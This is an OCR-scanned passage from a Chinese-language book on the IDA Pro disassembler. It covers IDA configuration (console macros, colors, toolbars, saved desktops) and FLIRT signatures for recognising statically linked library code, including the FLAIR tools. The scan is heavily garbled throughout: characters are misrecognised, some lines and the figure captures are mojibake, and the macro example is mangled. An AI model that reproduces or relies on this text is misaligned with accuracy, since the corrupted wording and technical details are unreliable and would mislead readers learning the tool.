男 一 方面 ， 有 少数 选项 仅 对 控制 台 版 本 的 IDA 有 效 。 例 如 ， 你 可 以 用 NOVICE 选项 让 IDA 以 
入 门 模式 启动 ， 在 这 种 模式 中 ，IDA 禁用 了 它 的 一 些 复杂 功能 ， 以 降低 学 习 IDA 的 难度 。 入 门 
模式 与 完整 模式 的 一 个 明显 不 同 在 于 ， 入 门 模式 几乎 不 提供 任何 子 窗口 。 

控制 台 用 户 需 要 更 多 地 依赖 于 热 键 。 为 实现 第 用 热 键 组 合 的 自动 操作 ， 控 制 台 模式 的 IDA fe 
供 了 键盘 安定 义 语 法 。 你 可 以 在 idatui.cfg 文件 中 找到 几 个 宏 实例 ,不 过 <IDADIR>/cfg/idausert.cfg 
(控制 台 版 本 中 与 idauserg.cfg 对 应 的 文件 对 是 你 保存 你 所 创建 的 宏 的 理想 位 置 . 默 认 的 idatui.cfg 
文件 中 包含 一 个 样本 宏 ， 如 下 所 示 ( 在 真正 的 idatui.cfg 中 ， 这 个 宏 并 没有 注释 ): 























@ MACRO O'"AIt-H" // this sample macro jumps to "start" label 
1 
"C" 
"S^ p^ ^q" 'r', Wb 
Enter 
j 


宏 定义 由 MACRO 关键 字 (9) 引入 ,后 面 紧 跟 这 个 宏 的 热 键 ( @ 0. FIER S PE, 
它 是 一 个 由 键 名 字符 串 或 字符 组 成 的 序列 , 这些 字 符 串 或 字符 可 能 本 里 就 是 热 键 组合。 这 个 宏 使 
用 ALT-H 激活 ， 它 打开 通过 热 键 G 打开 的 Jump to Address 对 话 框 ， 然 后 在 对 话 框 中 输入 start 
标签 ， 一 次 一 个 字符 ， 最 后 使 用 ENTER 键 关闭 这 个 对 话 框 。 注 意 ， 我 们 不 能 使 用 语法 “start” 
输入 符号 的 名 称 ， 因 为 IDA 可 能 会 将 它 当 成 是 热 键 的 名 称 ， 因 而 导致 错误 。 








WB 0000000 GUILD C] I] IDAL D [I 





最 后 ， 关 于 配置 文件 选项 ， 需 要 注意 的 是 ， 如 果 IDA 在 解析 配置 文件 时 遇 到 任何 错误 ， 它 
都 会 立即 终止 ,并 显示 一 条 错误 消息 ， 尝 试 描述 问题 的 本 质 。 在 这 个 问题 得 到 修复 之 前 ,你 无 法 
启动 IDA。 











11.2 ”其 他 IDA 配置 选项 


IDA 拥有 大 量 必须 通过 用 户 界 面 配 置 的 其 他 选项 。 格式 化 反 汇 编 行 的 选项 已 经 在 第 7 章 中 讨 
论 。 其 他 IDA 选项 通过 Options 菜 单 访问 。 多 数 情 况 下 ， 你 修改 的 任何 选项 仪 适用 于 当前 打开 的 
数据 库 。 关 闭 数据 库 后 ， 这 些 选 项 的 值 将 存储 在 相关 的 数据 库 文 件 中 。IDA 的 颜色 
( Options » Colors ) 和 字体 ( Options » Font) 是 两 个 例外 ， 因 为 它们 属于 全 局 选项 ， 一 旦 设置 ， 
将 适用 于 IDA 将 来 的 所 有 会 话 。Windows 版 本 IDA 的 选项 值 保存 在 Windows 注册 表 的 
HKEY CURRENT USER\Software\Hex-Rays\IDA 注册 表 项 中 。 至 于 非 Windows 版 本 的 IDA， 这 
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些 值 保存 在 根 目录 的 一 个 名 为 $4HOME/.idapro/ida.cfd 的 专 有 文件 中 。 

男 一 项 注册 表 设 置 与 对 话 框 有 关 ， 针 对 这 些 对 话 框 ， 你 选择 了 Do not display this dialog box 
again (不 再 显示 该 对 话 框 ) 选项 。 有 时 候 , 这 个 消息 以 复 选 框 的 形式 出 现在 一 些 消息 对 话 框 (你 
将 来 不 希望 见 到 它们 ) 的 右 下 角 。 如 果 你 选择 这 个 选项 ，IDA 将 在 HKEY CURRENT USER 
Software\Hex-Rays\IDA\Hidden Messages 注册 表 项 下 创建 一 个 注册 表 值 。 不 久 以 后 ， 如 果 你 想 要 
再 次 显示 隐藏 的 对 话 框 ， 就 需要 删除 这 个 注册 表 项 下 对 应 的 值 。 








11.2.1 IDA 闫 色 


在 IDA 窗口 中 ， 儿 乎 每 一 个 项 目的 颜色 都 可 以 通过 Options >» Colors 对 话 框 进行 定制 ， 如 
图 11-1 所 示 。 





Disassembly | Navigation band | Debugger | Arrows | Graph | misc | 
















segt00:00000000 55 MYUNK db 55h 
segCc00:00000001 02 MYDATA db offset MYCODE-1 ; Re 
segCc00:00000001 MYCODE: & ; CO 
segCc00:00000001 1D- 

seg000:00000001 2B- 


PU 


图 11-1 颜色 选择 对 话 框 





Disassembly 选项 卡 控制 反 汇 编 窒 口中 每 个 反 汇 编 行 的 不 同 部 分 所 使 用 的 颜色 。 上 面 的 窗口 
列 出 了 可 以 在 反 汇 编 窗 口中 显示 的 每 一 种 文本 类 型 ( @ )。 选 择 窗 口中 的 一 个 项 目 ，@ 处 将 列 出 
该 项 目的 类 型 。 使 用 Change Color 按钮 ， 可 以 给 任何 项 目 分 配 颜色 。 

颜色 选择 对 话 框 中 的 选项 卡 可 用 于 为 导航 栏 、 调 试 需 、 文 本 反 汇 编 视 图 左 侧 的 跳 转 箭头 、 以 
及 图 形 视 图 中 的 各 种 组 件 分 配 颜 色 。 上 有 具体 来 说 ，Graph 选项 卡 控制 图 形 节 点 、 标 题 栏 、 连 接 每 个 
节点 的 边 的 颜色 ， 而 Disassembly 选项 卡 则 控制 图 形 视图 中 反 汇 编 文 本 的 颜色 ，Misc 选项 卡 用 于 
定制 IDA 消息 窗口 的 颜色 。 





11.2.2 ”定制 IDA 工 具 栏 


除了 菜单 和 热 键 外 ，GUI 版 本 的 IDA 还 提供 大 量 的 工具 栏 按钮 ， 它 们 主要 分 布 在 IDA 的 20 
多 个 工具 栏 上 ,通常 ,工具 栏 位 于 IDA 来 单位 下 面 的 主 工 具 栏 区 域 , 用 户 可 以 通过 View » Toolbars 
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(查看 工具 栏 ) 及 单 访问 两 种 预定 义 的 工具 栏 模 式 : 基本 标 式 ( 该 模式 局 用 7 个 IDA 工具 栏 ) 
和 高 级 模式 ( 该 模式 局 用 每 一 个 IDA TRH J 根据 你 的 个 人 需要 ， 你 可 以 分 离 、 拖 动 和 重新 害 








位 每 个 工具 栏 , 将 其 放置 到 屏 硕 的 任何 位 置 。 如果 不 需 要 某 个 工具 栏 , 你 可 以 使 用 View > Toolbars 
蘑 单 将 其 从 窗口 中 完全 删除 ， 如 图 11-2 所 示 。 


Vicw Debugger Optone Windows Help 
* E 


Advanced mode 
vw Analysis 
v Dreakpoints 
Commente 
Cross references 


AN Delete hidden area 
Sela Fede heeri iles 


1 Ihr 
Vicws 
watches 

















图 11-2 工具 栏 配 置 菜 单 


右 击 IDA. 窗口 中 工具 栏 右边 的 空 日 区 域 ， 这 个 采 蛙 也 会 出 现 。 大 闭 主 工具 住 ， 所 有 的 工具 
位 将 从 窗口 中 消失 。 如 有 果 你 需要 为 反 汇编 窗口 提供 最 大 的 屏 舌 空间 ,就 可 以 选择 这 个 选项 。 你 对 
工具 栏 布局 所 做 的 任何 更 改 将 保存 在 当前 数据 库 中 。 如 末 这 时 打开 为 一 个 数据 库 , 工具 栏 将 恢复 
上 一 次 保存 这 个 数据 库 时 的 布局 。 如 有 果 你 打开 一 个 新 的 二 进 制 文件 ， 以 创建 一 个 新 数据 库 ， 这 时 
工具 栏 将 恢复 到 IDA 当前 的 默认 工具 栏 设置 。 

如 有 果 你 选 定 了 一 种 你 喜欢 的 工具 栏 布局 ， 并 日 希 望 将 其 作为 默认 设置 那么， 你 应 该 使 用 
Windows >» Save Desktop 将 当前 的 介面 布局 保存 为 默认 果 面 ,这 个 命令 打开 如 图 11-3 所 示 的 对 话 框 。 
































4 Seve disassembly desktop ?21x| 
| ny ida d=sktcp | 
[ Defaut 

OK | Cancel | Hab 





图 11-3 Save disassembly desktop 对 话 框 
JK D RIO EHI, IDA 会 要 求 你 为 这 种 配置 提供 一 个 名 称 。 如 末 选 择 Default & PUE , 
当前 的 蝎 面 布局 将 成 为 所 有 新 数据 库 以 及 你 复原 的 秽 面 (如 果 你 选择 Windows » Reset desktop ) 
的 爽 认 布局 。 要 将 窗口 恢复 到 你 定制 的 一 个 条 面 ， 请 选择 Windows » Load Desktop, ， 并 选择 你 想 
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要 加 载 的 布局 。 在 使 用 各 种 不 同 太 十 和 /或 分 辨 率 的 显示 融 时 ， 保 存 和 恢复 梨 面 特别 有 用 ， 使 用 
不 同 扩展 坞 或 连接 到 投影 仪 以 播放 演示 文稿 的 笔记 本 电脑 时 ， 经 稼 会 遇 到 这 种 情况 。 





11.3 ”小结 


最 初 使 用 IDA 时 ， 你 可 能 对 它 的 默认 行为 和 上 默认 的 GUI 布局 感到 非常 满意 。 逐 步 熟 悉 IDA 
的 基本 功能 后 ， 你 肯定 需要 找 方法 对 DA 进行 定制 ， 以 满足 自己 的 特殊 要 求 。 仅 仅 通过 一 童 内 
容 ， 我 们 不 可 能 全 面 介 绍 IDA 提供 的 每 一 个 选项 ， 但 是 ， 我 们 提供 了 一 些 线索 ， 以 帮助 你 找到 
这 些 选 项 。 我 们 还 重点 介绍 了 那些 你 在 操控 IDA 时 可 能 会 感 兴趣 的 选项 。 至 于 其 他 有 用 的 选项 ， 
还 有 待 好 奇 的 读者 去 深入 探索 。 














使 用 FLIRT 侈 名 来 识 列 库 





TU 我 们 将 开始 讨论 IDA 的 高 级 功能 。 同 时 ， 我 们 将 探讨 在 “最 初 的 目 动 分 析 已 经 
完成 ” 之后， 该 执行 什么 操作 。 本 章 将 讨论 各 种 技巧 ， 以 识别 标准 的 代码 序列 ， 如 静 
态 链接 二 进 制 文件 中 的 库 代 码 ， 或 者 编译 带 插 入 的 标准 初始 化 代码 和 辅助 函数 。 

在 春 手 对 二 进 制 文件 进行 赣 回 工程 时 , 你 最 不 应 该 做 的 事情 是 , 浪费 时 间 逆 向 工程 那些 你 只 
需 阅 该 一 本 于 册 、 一 段 源 代码 或 搜索 一 下 因特网 就 可 以 更 轻 多 地 了 解 其 行为 的 库 果 数 。 静 态 链 接 
二 进 制 文件 造成 的 问题 在 于 , 应 用 程序 代码 与 库 代 人 码 之 间 的 区 别 很 模糊 。 在 静态 链接 二 进 制 文件 
中 ， 所 有 库 与 应 用 程序 代码 混杂 在 一 起 , 组 成 了 一 个 庞大 的 可 执行 文件 。 不过， 有 许多 工具 可 以 
帮助 我 们 在 IDA 中 识别 和 标记 库 代 码 ， 使 我 们 可 以 把 注意 力 放 在 应 用 程序 日 身 的 代码 上 。 


12.1 ”快速 库 识别 和 和 蛤 定 技术 


库 快 速 识别 和 鉴定 技术 ， 简 称 FLIRT”, Æ IDA 用 于 识别 库 代 码 的 一 组 技术 。FLIRT 的 核心 
是 各 种 模式 匹配 算法 ， 这 些 算法 使 IDA 能 够 迅速 确定 : 一 个 经 过 反 汇 编 的 函数 是 否 与 IDA 已 知 
的 许多 签名 中 的 某 一 个 相 匹配 。IDA 自 带 的 签名 文件 保存 在 <IDADIR>/sig 目录 中 ， 其 中 的 大 多 
ZU X LI Windows 编 详 硕 目 囊 的 库 ， 当 然 其 中 也 包括 一 些 非 Windows 签名 。 

签名 文件 利用 一 种 目 定 义 格式 将 大 量 签名 数据 压 顷 并 封装 到 一 个 特定 于 IDA 的 头 文件 中 。 
多 数 情况 下 , 签名 文件 名 并 不 能 清楚 说 明 相 关 签 名 是 由 哪个 库 生 成 的 。 根 据 签名 文件 的 创建 方式 ， 
签名 文件 中 可 能 包含 一 个 描述 其 内 容 的 库 名 称 注 释 。 查 看 从 某 个 签名 文件 中 提取 出 来 的 ASCII 
内 容 的 前 几 行 代码 , 通常 可 以 找到 这 段 注 释 。 通常 ,下 面 的 Unix 命令 ”可 以 在 第 二 或 第 三 行 输 出 
结果 中 显示 上 述 注释 : 










































































# strings sigfile | head -n 3 








在 IDA 中 ， 有 两 种 方法 可 以 查看 与 签名 文件 有 关 的 注释 。 首 和 完 ， 你 可 以 通过 View 》 Open 
Subviews » Signatures 访问 应 用 于 茶 个 二 进 制 文件 的 签名 列表 。 其 次 ， 在 手动 签名 应 用 程序 中 ， 所 








CD 在 自动 处 理 新 加 载 的 二 进 制 文件 之 后 ，IDA 会 在 输出 窗口 中 生成 这 条 消息 。 
© 参见 http:/www.hex-rays.com/idapro/flirt.htm。 
© strings 命令 已 在 第 2 章 讨论 ， 而 head 命令 用 于 查看 其 输入 的 前 几 行 (这 里 为 3 行 ) 代码 。 


122 应 用 FLIRT 签 名 169 
有 签名 文件 的 列表 将 会 显示 出 来 ， 你 可 以 通过 File » Load File » FLIRT Signature File 打开 这 个 列表 。 
12.2 ”应 用 FLIRT 签名 
初次 打开 一 个 二 进 制 文件 时 , IDA 会 尝试 对 这 个 文件 的 入 口 点 应 用 特殊 的 签名 文件 ， 即 启动 


签名 。 因 为 由 各 种 编 详 天 生成 的 入口 点 代码 各 不 相同 ,因此 , 我们 可 以 通过 匹配 入 口 点 签名 来 识 
别 用 于 生成 菏 个 特定 二 进 制 文件 的 编译 通 。 

















Main 与 start 


HIT M EE THE HE ET E EIE LER [E b E ODE DEDE UE C Ll LED LB 
轩 TE TE ABE REL E C I caer H D E E LE LE H E M UL Dr B ELE LED LED ED LE UH C HEH Or ED (ED (ED Eb E E 
E E EE a HL E (ED E E ME OI RED D D 3 T ED RE E JE CD HI. OH (E LE M C D OD OD Or HE E EC 
HAE TE HD HL EE E I ETE E C BD b D T | c H: aen D DH d TED LED Eb OLK HE ED E ER d [E b EE 
DUDU mainitllilii i D E a a UO HL IDAT] DEBE BL EL ELLE GL OLD. E E EE EE BE BE ET D] 
BERE e 

HD ME B HL HT ET I BICI LED H. ach HOH RED LED HL HL ET E BLUE LED b Ces ox D Or Hr E TED LE 
uuuullllimintilii li E OH HELD D BLBLEE ELE E GL CL DO D. DL BE BE EE EE BE DE CT D] 
uuguulliulill lH ddl mini lli illii L L cleanup codel[] 


如 果 IDA BESZUUATT Se Em ERIdRIESS. Jb. CAMERA Iw 2i ie P Hn] s 
名 文件 , 并 将 其 应 用 于 该 文件 的 剩余 部 分 。IDA Ett JS 44 I e 7 Hives 2c, 如 Microsoft 
Visual C++ 或 Borland Delphi。 这 是 因为 ， 这些 编 详 善 目 计 的 二 进 制 库 的 数量 有 限 ， 而 与 开源 编译 
fi Di GNU gce ) 关联 的 库 却 拥 有 大 量 的 二 进 制 变 体 , 与 这 类 编译 絮 自 种 的 操作 系统 一 样 种 类 繁 
多 。 例 如， 每 个 版 本 的 FreeBSD 都 日 市 有 一 个 特殊 的 C 标准 库 。 为 了 获得 最 佳 模式 匹配 效果 ， 
你 需要 为 每 一 种 不 同 版 本 的 库 生 成 签名 文件 。 想 象 一 下 ， 收 集 每 一 个 版 本 的 Linux 自 带 的 libc.a- 
的 每 一 个 变 体 ， 其 难度 会 有 多 大 ! 这 人 简直 是 一 个 无 法 完成 的 任务 。 从 某 种 程度 上 说 ， 这 些 差异 归 
结 为 库 源 代码 的 变化 ( 因而 导致 不 同 的 编译 代码 ) 但是， 巨大 的 差异 也 是 因为 使 用 了 不 同 的 编 
译 选 项 ， 如 优化 设置 ， 以 及 在 创建 库 时 使 用 了 不 同 的 编译 器 版 本 。 结 果 ，IDA 自 带 的 开源 编译 带 
库 签名 文件 非常 少 。 不 过 ， 如 下 所 述 ，Hex-Rays 提供 了 各 种 工具 ， 用 于 由 静态 库 生 成 你 自己 的 
签名 文件 。 

那么 ,在 什么 情况 下 ， 你 需要 手动 对 数据 库 应 用 签名 呢 ? 有 时 候 ，IDA 能 够 正确 识别 创建 二 
进 制 文件 所 使 用 的 编译 需 , 但 它 并 没有 相关 编译 器 库 的 签名 。 在 这 种 情况 下 ,你 要 么 完全 不 用 签 
名 ， 要 么 需要 获得 二 进 制 文件 所 使 用 的 静态 库 的 副本 ， 并 生成 你 目 己 的 签名 。 其 他 情况 下 ，IDA 
可 能 根本 无 法 识别 一 个 编译 带 ， 因 而 也 无 法 确定 该 对 数据 库 应 用 哪些 签名 。 在 分 析 模 糊 代 码 时 ， 
你 经 常会 遇 到 这 种 情况 . 为 防止 编译 需 识 别 ， 混 消 代 人 码 中 的 局 动 例 程 (startup routine ) 经 过 了 非 












































(D libca 是 Unix 系统 上 的 静态 链接 二 进 制 文件 所 使 用 的 C 标准 库 。 
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稼 复杂 的 改编 。 这 时 ， 你 必须 首先 对 二 进 制 文件 进行 大 量 的 “去 模糊 ”处 理 ， 然 后 才 有 可 能 匹配 
库 签 名 。 我 们 将 在 第 21 章 中 讨论 处 理 模糊 代码 的 技巧 。 

无 论 出 于 什么 原因 , 如 果 和 希望 手动 对 一 个 数据 库 应 用 签名 , 可 以 通过 File » Load File > FLIRT 
Signature File 打开 如 图 12-1 所 示 的 选择 签名 对 话 框 。 
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图 12-1 选择 FLIRT 签名 


File 一 栏 显示 IDA 的 <IDADIR>/sig 目录 中 每 个 .sig 文件 的 名 称 。 需 要 注意 的 是 , 你 不 能 为 .sig 
文件 指定 另外 的 存储 位 置 。 如 采 你 生成 了 目 己 的 签名 ， 它 们 也 需要 和 其 他 .sig 文件 一 起 ,存储 在 
<IDADIR>/sig 目录 中 。Library name 一 栏 显示 般 入 到 每 个 文件 中 的 库 名 称 注 释 。 记 住 ， 这 些 注释 
的 描述 性 完全 取决 于 签名 创建 者 ( 可 能 就 是 你 自己 )。 

选择 一 个 库 模 块 ，IDA 将 加 载 对 应 的 .sig 文件 中 包含 的 签名 ， 并 将 其 与 数据 库 中 的 每 一 个 也 
数 进 行 比 较 。 你 一 次 只 能 应 用 一 组 签名 ， 因 此 ， 如 有 果 你 希望 对 一 个 数据 库 应 用 几 组 不 同 的 签名 ， 
需要 重复 上 述 过 程 。 如 采 发 现 一 个 图 数 与 签名 相 匹配 ，IDA 会 将 这 个 函数 标记 为 库 函 数 ， 并 根据 
与 其 匹配 的 签名 自动 对 它 进行 重合 名 。 

















sa 0000 ma4naunagngnagaununungagagaupnanagnagguatu 
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如 前 所 述 , 病态 链接 二 进 制 文件 模糊 了 应 用 程序 代码 与 库 代 码 之 间 的 区 别 。 如 采 你 足够 竺 运 ， 
拥有 一 个 没有 去 除 符 号 的 静态 链接 二 进 制 文 件 , 那么 , 你 至 少 拥有 有 用 的 函数 名 ( 和 可 信赖 的 程 
序 员 创 建 的 函数 名 一 样 有 用 ) 来 帮助 你 对 代码 进行 分 类 。 但 是 , 如 末 二 进 制 文件 已 经 被 去 除 符 号 ， 
那么 ， 你 拥有 的 仅仅 是 数 百 个 使 用 IDA. 生成 的 名 称 的 函数 ， 至 于 这 些 了 少数 的 用 途 ， 它 们 的 名 称 
无 法 提供 任何 信息 。 在 这 两 种 情况 下 ， 只 要 拥有 相关 签名 ，IDA 仍然 能 够 识别 出 库 函 数 (去 除 符 
号 的 二 进 制 文 件 中 的 函数 名 称 并 不 能 为 IDA. 提供 足够 的 信息 ， 使 它 准确 判定 一 个 函数 是 否 为 库 
PRA). BI 12-2 是 一 个 静态 链接 二 进 制 文件 的 “概况 导航 栏 ”。 
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Navigator Scale: 1 pixel = 64 bytes; Range: 080480B8-0804F 178 Library function Data 
4 ^ Bl Regular function Bl Unexplored 
| > 4 E instruction I External symbol 
Additional display: | -] 


图 12-2 ”应 用 签名 之 前 的 静态 链接 二 进 制 文件 
在 这 个 窗口 中 , 没有 函数 被 确定 为 库 困 数 ， 因 此 ， 你 需要 深入 分 析 代 码 。 在 应 用 一 组 适当 的 
签名 后 ,“ 概 况 导 航 栏 ”如 图 12-3 所 示 。 





Navigator Scale: 1 pixel = 64 bytes; Range: 080480B8-0804F 178 Library function ` Data 

4 b Bl Regular function Bl Unexplored 

> 4 E instruction I External symbol 
Additional display: | -] 


图 12-3 应 用 签名 之 后 的 静态 链接 二 进 制 文件 


如 你 所 见 ,“ 概 况 导 航 栏 ”证 实 了 应 用 一 组 特殊 签名 所 产生 的 效 末 。 巾 于 多 数 郴 数 都 找到 与 
之 匹配 的 签名 ，IDA 将 大 部 分 的 代码 标记 为 库 代 人 码 ， 并 对 它们 进行 了 相应 的 重 命 名 。 在 图 12-3 
所 示 的 例子 中 ， 特 定 于 应 用 程序 的 代码 很 可 能 集中 在 导 币 栏 窗口 的 最 左边 。 

在 应 用 签名 时 ， 有 两 个 值得 注意 的 地 方 。 第 一 ， 即 使 是 对 一 个 尚未 去 除 符号 的 二 进 制 文件 ， 
签名 仍然 有 用 。 这 时 ， 你 更 多 的 是 使 用 签名 帮助 IDA 识别 库 函 数 ， 而 不 是 对 它们 进行 重 命 名 。 
其 次 , 静态 链接 二 进 制 文件 可 能 由 几 个 单独 的 库 组 成 , 你 需要 对 其 应 用 几 组 签名 才能 完全 识别 所 
有 的 库 函 数 。 每 应 用 一 个 签名 ,“ 概 况 导 航 栏 ”部 会 发 生变 化 ， 以 反映 你 发 现 的 库 代 人 码 。 图 12-4 
显示 的 就 是 这 样 一 个 例子 。 在 这 个 图 中 ,你 看 到 的 是 一 个 使 用 C 标准 库 和 OpenSSL 加 密 库 静态 
链接 的 二 进 制 文件 。 






































Navigator Scale: 1 pixel = 4096 bytes; Range: 080480F4-081E8EA4 Library function Data 

| WT IER 2 777 5— 

> 1 E instruction I External symbol 
Additional display: | -] 


图 12-4 ”应 用 前 几 个 签名 后 的 静态 二 进 制 文件 


具体 来 说 ， 我 们 看 到 ， 在 对 二 进 制 文件 应 用 适当 的 OpenSSL 签名 后 ，IDA 将 一 个 窒 小 的 代 
码 融 (地 址 范围 左 侧 的 浅 色 代 码 齐 ) 标记 为 了 库 人 代码。 通常， 要 创建 静态 链接 二 进 制 文件 ， 首 先 
应 插入 应 用 程序 代码 ， 其 次 附加 所 需 的 库 ， 最 后 得 到 可 执行 文件 。 根 据 图 12-4, 我 们 可 以 得 出 结 
论 : OpenSSL 库 的 右 侧 很 可 能 是 其 他 的 库 代 码 ， 而 应 用 程序 代码 则 位 于 OpenSSL 库 左 侧 的 一 条 
非常 罕 小 的 代码 涡 中 。 如 果 我 们 继续 对 图 12-4 中 的 二 进 制 文件 应 用 签名 ， 最 终 的 “概况 导航 栏 ” 
将 如 图 12-5 所 示 。 














Navigator Scale: 1 pixel = 4096 bytes; Range: 080480F4-081E8EA4 Library function ` Data 

4 | ul | aen E eas 
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Additional display: | -] 


图 12-5 ”应 用 几 组 签名 后 的 静态 二 进 制 文件 


(D 参见 http://www.openssl.org/。 
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在 这 个 例子 中 ， 我们 应 用 了 libc、libcrypto 、libkrbs libresolv 及 其 他 库 的 签名 。 有 时 候 ， 我 
们 根据 二 进 制 文件 中 的 字符 串 来 选择 签名 。 其 他 情况 下 , 我 们 选择 与 二 进 制 文件 中 已 经 确定 的 其 
他 库 关 系 密切 的 签名 。 wA, 导航 窗 口 会 在 导航 带 的 中 间 显 示 一 个 深 色 的 代码 带 , 在 导航 带 的 最 
左边 缘 显 示 一 个 更 小 的 深 色 代码 带 。 要 确定 二 进 制 文件 中 剩 下 的 非 库 代 码 的 性 质 ,你 需要 进行 更 
加 深入 的 分 析 。 在 这 个 例子 中 ， 我们 知道 ， 中 间 的 深 色 代码 带 是 一 种 尚未 识别 的 库 ， 而 左 侧 的 深 
色 代 码 带 则 为 应 用 程序 代码 。 


12.3 创建 FLIRT 签名 文件 


如 前 所 述 ，IDA 不 可 能 自 带 现 有 的 每 一 个 静态 库 的 签名 文件 。 为 了 加 IDA 用 户 提供 创建 他 们 
日 己 的 签名 所 需 的 工具 和 信息 ，Hex-Rays JF f. FLAIR (Fast Library Acquisition for Identification 
and Recognition， 快 速 获取 库 的 识别 和 鉴定 ) 工具 集 ， 你 可 以 从 IDA 发 行 版 光盘 上 获得 FLAIR 
工具 ,被 授权 用 户 也 可 以 从 Hex-Rays 网 站 "上 下 载 该 工具 ,与 IDA 的 另外 几 个 附加 件 一 样 ,FLAIR 
工具 通过 一 个 Zip 文件 发 布 。Hex-Rays 不 一 定 会 为 每 一 个 版 本 的 IDA 发 布 新 版 的 FLAIR 工具 ， 
因此 ， 只 需 使 用 最 新 版 本 的 FLAIR 工具 ， 只 要 它 不 高 于 你 的 IDA 版 本 即 可 。 

ZZ FLAIR 实用 工具 的 过 程 非常 徐 单 ， 只 需 解压 相关 的 Zip 文件 即 可 。 尽 管 如 此 ， 我 们 仍 
然 强 烈 建议 你 创建 一 个 专用 的 flair 目录 作为 目标 目录 ,因为 Zip 文件 可 能 并 不 包含 一 个 顶级 目录 。 
解压 FLAIR 文件 后 ， 你 会 发 现 几 个 文本 文件 ， 它 们 是 FLAIR 工具 的 文档 资料 。 其 中 特别 有 用 的 
文件 如 下 所 示 。 

口 readme.txt。 这 个 文件 总 体 概述 签名 创建 过 程 。 

口 plb.txt。 这 个 文件 描述 静态 库 解 析 吉 plb.exe 的 用 法 。 库 解析 圳 将 在 12.3.3 节 中 详细 讨论 。 

口 pat.txt。 这 个 文件 详细 说 明了 模式 文件 的 格式 ， 它 是 签名 创建 过 程 的 第 一 步 。 我 们 还 将 在 

12.3.3 节 介 绍 模式 文件 。 
O sigmake.txt。 这 个 文件 摘 述 sigmake.exe 文件 的 用 法 ， 该 文件 用 于 从 模式 文件 生成 .sig X 
件 。 请 参阅 12.3.4 节 了 解 详情 。 

其 他 顶级 目录 包括 bin 目录 ， 其 中 包括 FLAIR 工具 的 所 有 可 执行 文件 和 startup 目录 ， 后 者 
包含 与 各 种 编译 器 及 其 相关 的 输出 文件 类 型 (PE、ELF 等 ) 有 关 的 常见 启动 顺序 的 模式 文件 。 对 
F 6.1 之 前 的 版 本 , FLAIR 工具 只 能 在 Windows 命令 提示 符 下 运行 , 但 其 生成 的 签名 文件 可 以 用 
在 所 有 的 IDA 版 本 中 (Windows, Linux 和 OS X )。 


12.3.1 创建 签名 概述 


创建 签名 文件 的 基本 过 程 听 起 来 并 不 复杂 ， 可 以 归结 为 4 个 看 似 简单 的 步骤 。 
(1) 获得 一 个 你 希望 为 其 创建 签名 文件 的 静态 库 。 
(2) 利用 其 中 一 个 FLAIR 解析 需 为 该 库 创 建 一 个 模式 文件 。 





















































OD 该 工具 的 当前 版 本 为 flair61.zip ， 下 载 地 址 为 http://www.hex-rays.com/idapro/ida/flair61.zip。 下 载 该 文件 时 ， 你 需 
要 输入 Hex-Rays 提供 的 用 户 名 和 密码 。 
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(3) 运行 Sigmake.exe 来 处 理 生成 的 模式 文件 ， 并 生成 一 个 签名 文件 。 
(4) 将 新 的 签名 文件 复制 到 <IDADIR>/sig 日 录 中 ， 安 装 这 个 文件 。 
遗憾 的 是 , 实际 上 只 有 最 后 一 个 步 坚 较为 人 简单。 在 下 面 几 方 中 , 我 们 将 详细 讨论 前 3 个 步 又。 











12.3.2. 识别 和 获取 静态 库 


生成 签名 的 第 一 个 步 又 是 确定 一 个 你 希望 为 其 生成 签名 的 静态 库 。 由 于 各 种 原因 ,完成 这 个 
任务 可 能 需要 克服 一 些 挑 成 。 第 一 个 挑 成 是 确定 你 到 撒 需 要 哪 一 个 库 。 如 末 你 足够 笠 运 ,你 所 分 
析 的 二 进 制 文件 并 没有 去 除 符 号 ,那么 ,你 的 反 汇 编 代 码 清单 将 显示 真实 的 图 数 名 称 。 这 时 ,你 
只 需要 使 用 因特网 搜索 ， 就 可 以 获得 一 些 线索 。 

与 未 去 除 符 号 的 二 进 制 文件 相 比 ， 已 去 除 从 号 的 二 进 制 文件 并 不 能 为 我 们 提供 太 大 的 帮助 。 
缺乏 也 数 名 称 的 帮助 时 , 使 用 strings 进行 搜索 也 可 以 得 到 足够 特殊 的 字符 串 , 以 帮助 你 识别 库 ， 
如 下 面 的 例子 所 示 ， 从 中 你 一 眼 就 可 以 发 现 相 关 的 库 : 














OpenSSL 1.0.0b-fips 16 Nov 2010 


HH, 版 权 声 明和 错误 字符 串 已 经 足够 特殊 , 当然 , 你 同样 可 以 使 用 因特网 来 缩小 搜索 范围 。 
如 果 你 选择 从 命令 行 中 运行 Strings， 一 定 要 记得 使 用 -a 选项 ， 迫 使 strings 扫描 整个 二 进 制 文 
件 。 否 则 ， 你 可 能 会 遗漏 一 些 有 用 的 字符 串 数据 。 

对 开源 库 来 说 ,你 很 可 能 会 找到 它们 的 源 代 码 。 不 过 , 虽然 源 代码 可 以 帮助 你 理解 二 进 制 文 
件 的 行为 ,但 你 不 能 使 用 它 来 为 你 生成 签名 。 不 过 ,你 可 以 使 用 源 代码 创建 你 自己 的 静态 库 ， 然 
后 使 用 这 个 库 来 生成 签名 。 然而 , 创建 过 程 中 出 现 的 变化 很 有 可 能 会 在 生成 的 库 与 你 分 析 的 库 之 
间 造 成 相当 大 的 差异 ， 因 此 ， 你 生成 的 签名 也 不 十 分 准确 。 

当然 ， 最 好 的 办 法 还 是 确定 你 所 分 析 的 二 进 制 文件 的 真实 来 源 ， 即 具体 的 操作 系统 、 操 作 系 
统 版 本 和 发 行 版 本 ( 如 果 适 用 )。 根 据 这 些 信息 ， 创 建 签 名 的 最 佳 方法 是 从 一 个 配置 完全 相同 的 
系统 中 复制 相关 的 库 。 目 然 , 这 会 导致 下 一 个 问题 : 对 任意 一 个 二 进 制 文件 来 说 ， 如 何 确定 它 到 
底 是 在 什么 系统 上 创建 的 呢 ? 应 对 这 个 问题 的 第 一 个 步骤 是 使 用 file 实用 工具 获得 一 些 与 该 二 
进 制 文件 有 关 的 基本 信息 。 在 第 2 曹 中， 我 们 看 到 了 file 工具 的 一 些 样本 输出 。 有 时 候 ， 这 些 
输出 足以 帮助 你 确定 可 能 的 操作 系统 。 下 面 的 例子 就 是 file 文件 的 一 个 非常 特殊 的 输出 : 
































$ file sample file 1 
sample file 1: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), 
statically linked, for FreeBSD 8.0 (800107), stripped 


从 这 个 例子 中 ， 我 们 可 以 迅速 确定 该 文件 使 用 的 是 FreeBSD 8.0 Ri, MAERT] libc.a 库 。 
下 面 的 例子 更 加 复杂 一 些 : 








$ file sample file 2 
